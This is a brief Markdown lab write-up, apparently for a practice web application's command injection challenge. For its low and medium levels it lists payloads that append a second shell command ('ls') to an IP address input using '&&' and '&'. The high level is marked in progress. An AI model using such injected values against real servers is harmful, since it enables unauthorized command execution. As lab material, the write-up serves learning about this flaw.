15 lines
199 B
Markdown
15 lines
199 B
Markdown
# Command Injection
|
|
The aim of this challenge is to inject a command to the server that execute a script.
|
|
# Low
|
|
```bash
|
|
127.0.0.1 && ls
|
|
```
|
|
|
|
# Medium
|
|
```bash
|
|
127.0.0.1 & ls
|
|
```
|
|
|
|
# High
|
|
> In progress
|